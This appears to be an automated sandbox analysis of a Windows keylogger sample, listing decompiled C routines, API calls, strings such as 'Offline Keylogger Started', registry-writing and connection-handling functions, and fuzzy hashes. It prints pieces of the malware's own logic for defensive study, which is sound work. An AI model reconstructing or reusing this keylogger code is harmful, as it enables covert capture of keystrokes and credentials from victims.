                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,00017838,0041BCB0,00000000,0041B900,?,004095B7,?,?,?,?,?,?,?,?,00000000), ref: 00405194
                                                                                  • Part of subcall function 00405156: GetKeyboardLayout.USER32(00000000), ref: 0040515B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051B9
                                                                                  • Part of subcall function 00405DD3: GetLocalTime.KERNEL32(?,00017838,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                                                                  • Part of subcall function 00405DD3: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                                                                  • Part of subcall function 00405DD3: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                                                                  • Part of subcall function 00405DD3: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                                                                  • Part of subcall function 00405DD3: malloc.MSVCRT ref: 00405E37
                                                                                  • Part of subcall function 00405DD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                                                                  • Part of subcall function 00405DD3: sprintf.MSVCRT ref: 00405E69
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                                                                  • Part of subcall function 00405DD3: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                                                                  • Part of subcall function 00405DD3: SetEvent.KERNEL32(00000000), ref: 00405E95
                                                                                  • Part of subcall function 00405DD3: free.MSVCRT(00000000), ref: 00405E9C
                                                                                  • Part of subcall function 00405DD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Offline Keylogger Started,?,?,?,?,004095B7,?,?,?,?,?,?,?,?,00000000,00000011), ref: 004051D0
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 004051E4
                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040528A,0041B900,00000000,00000000), ref: 00405204
                                                                                • CreateThread.KERNELBASE(00000000,00000000,0040526A,0041B900,00000000,00000000), ref: 00405214
                                                                                • CreateThread.KERNELBASE(00000000,00000000,00405299,0041B900,00000000,00000000), ref: 00405220
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00405225
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@V01@$??0?$basic_string@CreateD@1@@Thread$??4?$basic_string@D@2@@0@G@2@@std@@G@std@@Hstd@@V01@@V?$basic_string@Y?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@EventKeyboardLayoutLocalTimeV10@V10@@freemallocsprintf
                                                                                • String ID: Offline Keylogger Started$[INFO]
                                                                                • API String ID: 2375278975-3749928830
                                                                                • Opcode ID: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                                                                • Instruction ID: 8504defec12b76ce36e14f0a9cecbbf8a862f08db34b94f1b2a8f952895fda8e
                                                                                • Opcode Fuzzy Hash: 303e79ea2cc5c2cbfd283ade35e3199abe0d4046d42ab0fcd3c9033e32dd0592
                                                                                • Instruction Fuzzy Hash: D611D371601A18BBD7117766DC8DDEF3F2CDE862E0740407AF80692281DB794944CEF9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 44%
                                                                                			E004027B1(void* __ecx) {
                                                                                				char _v5;
                                                                                				struct _SYSTEMTIME _v24;
                                                                                				char _v40;
                                                                                				void* _v56;
                                                                                				char* _t29;
                                                                                				char* _t30;
                                                                                				void* _t38;
                                                                                				intOrPtr _t46;
                                                                                
                                                                                				_t38 = __ecx;
                                                                                				 *((intOrPtr*)(__ecx + 0x40)) = 0;
                                                                                				if( *((intOrPtr*)(__ecx + 0x3c)) <= 0) {
                                                                                					L3:
                                                                                					if( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                                                                						_t46 =  *0x41bcac; // 0x0
                                                                                						if(_t46 != 0) {
                                                                                							GetLocalTime( &_v24);
                                                                                							_t29 =  &_v5;
                                                                                							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [WARNING] ", _t29, "Timeout expired, resetting connection.\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff);
                                                                                							_t30 =  &_v40;
                                                                                							L00414170();
                                                                                							__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t30, _t29);
                                                                                							_t21 = printf(_t30);
                                                                                							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                							__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                						}
                                                                                						E004020F4(_t21, _t38);
                                                                                					}
                                                                                					L7:
                                                                                					 *((char*)(_t38 + 0x38)) = 0;
                                                                                					 *((char*)(_t38 + 0x39)) = 0;
                                                                                					return 0;
                                                                                				}
                                                                                				while( *((intOrPtr*)(_t38 + 0x39)) == 0) {
                                                                                					Sleep(0x3e8); // executed
                                                                                					 *(_t38 + 0x40) =  *(_t38 + 0x40) + 1;
                                                                                					_t21 =  *(_t38 + 0x40);
                                                                                					if( *(_t38 + 0x40) <  *((intOrPtr*)(_t38 + 0x3c))) {
                                                                                						continue;
                                                                                					}
                                                                                					goto L3;
                                                                                				}
                                                                                				goto L7;
                                                                                			}












                                                                                APIs
                                                                                • Sleep.KERNELBASE(000003E8), ref: 004027D3
                                                                                • GetLocalTime.KERNEL32(?), ref: 004027F5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [WARNING] ,?,Timeout expired, resetting connection.,?,?,?,?), ref: 00402820
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040282B
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402835
                                                                                • printf.MSVCRT ref: 0040283C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402848
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402851
                                                                                Strings
                                                                                • Timeout expired, resetting connection., xrefs: 00402815
                                                                                • %02i:%02i:%02i:%03i [WARNING] , xrefs: 0040281B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalSleepTimeV10@V?$basic_string@printf
                                                                                • String ID: %02i:%02i:%02i:%03i [WARNING] $Timeout expired, resetting connection.
                                                                                • API String ID: 2756237499-4159561219
                                                                                • Opcode ID: 796498a58e694e78d7cded5717da42e64b630020b686e4dba5f7067004d3c91d
                                                                                • Instruction ID: eb574a52e8b17308bab00ba60a15c3ae4eff644db24cd51b069feea48370dafb
                                                                                • Opcode Fuzzy Hash: 796498a58e694e78d7cded5717da42e64b630020b686e4dba5f7067004d3c91d
                                                                                • Instruction Fuzzy Hash: 95119372900758EFCB11EBA4D9898EFB7B9BB48301740447FFA42E3581E6B5A944C768
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 79%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                				CHAR* _v8;
                                                                                				intOrPtr* _v24;
                                                                                				intOrPtr _v28;
                                                                                				struct _STARTUPINFOA _v96;
                                                                                				int _v100;
                                                                                				char** _v104;
                                                                                				int _v108;
                                                                                				void _v112;
                                                                                				char** _v116;
                                                                                				intOrPtr* _v120;
                                                                                				intOrPtr _v124;
                                                                                				intOrPtr* _t24;
                                                                                				void* _t27;
                                                                                				intOrPtr _t36;
                                                                                				signed int _t38;
                                                                                				int _t40;
                                                                                				intOrPtr* _t41;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr* _t54;
                                                                                				intOrPtr _t57;
                                                                                				intOrPtr _t60;
                                                                                
                                                                                				_push(0xffffffff);
                                                                                				_push(0x416e50);
                                                                                				_push(0x414130);
                                                                                				_push( *[fs:0x0]);
                                                                                				 *[fs:0x0] = _t57;
                                                                                				_v28 = _t57 - 0x68;
                                                                                				_v8 = 0;
                                                                                				__set_app_type(2);
                                                                                				 *0x41c26c =  *0x41c26c | 0xffffffff;
                                                                                				 *0x41c270 =  *0x41c270 | 0xffffffff;
                                                                                				 *(__p__fmode()) =  *0x41c264;
                                                                                				_t24 = __p__commode();
                                                                                				_t47 =  *0x41c260;
                                                                                				 *_t24 =  *0x41c260;
                                                                                				 *0x41c268 = _adjust_fdiv;
                                                                                				_t27 = E00404F3A( *_adjust_fdiv);
                                                                                				_t60 =  *0x41b190; // 0x1
                                                                                				if(_t60 == 0) {
                                                                                					__setusermatherr(E0041412C);
                                                                                					_pop(_t47);
                                                                                				}
                                                                                				E0041411A(_t27);
                                                                                				_push(0x41b0e8);
                                                                                				_push(0x41b0e4);
                                                                                				L00414114();
                                                                                				_v112 =  *0x41c25c;
                                                                                				__getmainargs( &_v100,  &_v116,  &_v104,  *0x41c258,  &_v112);
                                                                                				_push(0x41b0e0);
                                                                                				_push(0x41b000); // executed
                                                                                				L00414114(); // executed
                                                                                				_t54 =  *_acmdln;
                                                                                				_v120 = _t54;
                                                                                				if( *_t54 != 0x22) {
                                                                                					while(1) {
                                                                                						__eflags =  *_t54 - 0x20;
                                                                                						if(__eflags <= 0) {
                                                                                							goto L7;
                                                                                						}
                                                                                						_t54 = _t54 + 1;
                                                                                						_v120 = _t54;
                                                                                					}
                                                                                				} else {
                                                                                					do {
                                                                                						_t54 = _t54 + 1;
                                                                                						_v120 = _t54;
                                                                                						_t42 =  *_t54;
                                                                                					} while (_t42 != 0 && _t42 != 0x22);
                                                                                					if( *_t54 == 0x22) {
                                                                                						L6:
                                                                                						_t54 = _t54 + 1;
                                                                                						_v120 = _t54;
                                                                                					}
                                                                                				}
                                                                                				L7:
                                                                                				_t36 =  *_t54;
                                                                                				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                					goto L6;
                                                                                				}
                                                                                				_v96.dwFlags = 0;
                                                                                				GetStartupInfoA( &_v96);
                                                                                				_t68 = _v96.dwFlags & 0x00000001;
                                                                                				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                					_t38 = 0xa;
                                                                                				} else {
                                                                                					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                				}
                                                                                				_t40 = E00408C98(_t47, _t68, GetModuleHandleA(0), 0, _t54, _t38); // executed
                                                                                				_v108 = _t40;
                                                                                				exit(_t40);
                                                                                				_t41 = _v24;
                                                                                				_t49 =  *((intOrPtr*)( *_t41));
                                                                                				_v124 = _t49;
                                                                                				_push(_t41);
                                                                                				_push(_t49);
                                                                                				L0041410E();
                                                                                				return _t41;
                                                                                			}


























                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                • String ID:
                                                                                • API String ID: 801014965-0
                                                                                • Opcode ID: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                                                                • Instruction ID: 203440f8f63e4a3495bc52082528d8eb2041b3e21c5ddc4624b2c062dd02aed8
                                                                                • Opcode Fuzzy Hash: b2c8cba3d33740866d2ef724b214b525c3666044ca6997f550807a2c6c4dc531
                                                                                • Instruction Fuzzy Hash: 92416DB1D40708EFDB209FA5DC89AEA7FB8EB49710F20412FE95197291D7784880CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,00018C06), ref: 0040AD91
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040ADA1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                                                                  • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                                                                  • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                                                                  • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                                                                  • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                                                                  • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                                                                  • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                                                                  • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                                                                  • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                                                                  • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                                                                  • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                                                                  • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                                                                  • Part of subcall function 004020F4: #3.WS2_32(0041BE70,0041BE70,004021ED,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004020F9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@
                                                                                • String ID:
                                                                                • API String ID: 245491849-0
                                                                                • Opcode ID: 4550fca6c17782d827f3fd9ee1601929510a12ddcef61b401cf599926b843e03
                                                                                • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                                                                • Opcode Fuzzy Hash: 4550fca6c17782d827f3fd9ee1601929510a12ddcef61b401cf599926b843e03
                                                                                • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 28%
                                                                                			E0040B708(void* _a4, void* _a8, char* _a12, void* _a16, int _a32) {
                                                                                				char* _t13;
                                                                                				long _t15;
                                                                                				void* _t18;
                                                                                				int _t19;
                                                                                				void* _t25;
                                                                                
                                                                                				_t13 = RegCreateKeyA(_a4, _a8,  &_a8); // executed
                                                                                				if(_t13 != 0) {
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return 0;
                                                                                				} else {
                                                                                					__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ(_t25, _t18);
                                                                                					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                					_t19 = 0;
                                                                                					_t15 = RegSetValueExA(_a8, _a12, 0, _a32, _t13, _t13); // executed
                                                                                					RegCloseKey(_a8);
                                                                                					if(_t15 == 0) {
                                                                                						_t19 = 1;
                                                                                					}
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return _t19;
                                                                                				}
                                                                                			}









                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                                                                • RegSetValueExA.KERNELBASE(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                                                                • RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B76A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?size@?$basic_string@CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 2159132150-0
                                                                                • Opcode ID: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                                                                • Instruction ID: 9d1a0f58833d5773874e13301f2acc6375a40e0de57f65db8332e1017e2c10e5
                                                                                • Opcode Fuzzy Hash: 5ecf23a70311ac73239b37152282b423ceb27d5ce4f56abafe3e511b106da1cd
                                                                                • Instruction Fuzzy Hash: C901B67200050DEFCF01AFE0ED998EE7B69FB98355B008135FD1AA6160DB319D24DBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 59%
                                                                                			E00405532(void* __ecx) {
                                                                                				signed int _t8;
                                                                                				WCHAR* _t9;
                                                                                				long _t12;
                                                                                				void* _t21;
                                                                                				void* _t22;
                                                                                				void* _t28;
                                                                                
                                                                                				_t8 =  *0x41b988; // 0x0
                                                                                				_t9 = _t8 |  *0x41b98c;
                                                                                				_t22 = __ecx;
                                                                                				if(_t9 != 0) {
                                                                                					 *((char*)(__ecx + 0x30)) = 0;
                                                                                					do {
                                                                                						__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                						_t9 = CreateFileW(_t9, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                						_t21 = _t9;
                                                                                						if(_t21 == 0xffffffff) {
                                                                                							 *((char*)(_t22 + 0x30)) = 0;
                                                                                						} else {
                                                                                							_t12 = GetFileSize(_t21, 0);
                                                                                							_t28 = 0 -  *0x41b98c; // 0x0
                                                                                							if(_t28 >= 0 && (_t28 > 0 || _t12 >=  *0x41b988)) {
                                                                                								 *((char*)(_t22 + 0x30)) = 1;
                                                                                								if( *((intOrPtr*)(_t22 + 0x3c)) != 0) {
                                                                                									E00405D50(_t22);
                                                                                								}
                                                                                								Sleep(0x2710);
                                                                                							}
                                                                                							_t9 = FindCloseChangeNotification(_t21); // executed
                                                                                						}
                                                                                					} while ( *((char*)(_t22 + 0x30)) == 1);
                                                                                					if( *((intOrPtr*)(_t22 + 0x3c)) == 0 &&  *0x41b154 == 0x31) {
                                                                                						__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z(_t22 + 0x54);
                                                                                						return E00405180(_t22);
                                                                                					}
                                                                                				}
                                                                                				return _t9;
                                                                                			}










                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                                                                • CreateFileW.KERNELBASE(00000000), ref: 00405569
                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                                                                • Sleep.KERNEL32(00002710), ref: 004055A7
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileG@2@@std@@G@std@@U?$char_traits@V?$allocator@$??0?$basic_string@?c_str@?$basic_string@ChangeCloseCreateFindNotificationSizeSleepV01@@
                                                                                • String ID:
                                                                                • API String ID: 3579047504-0
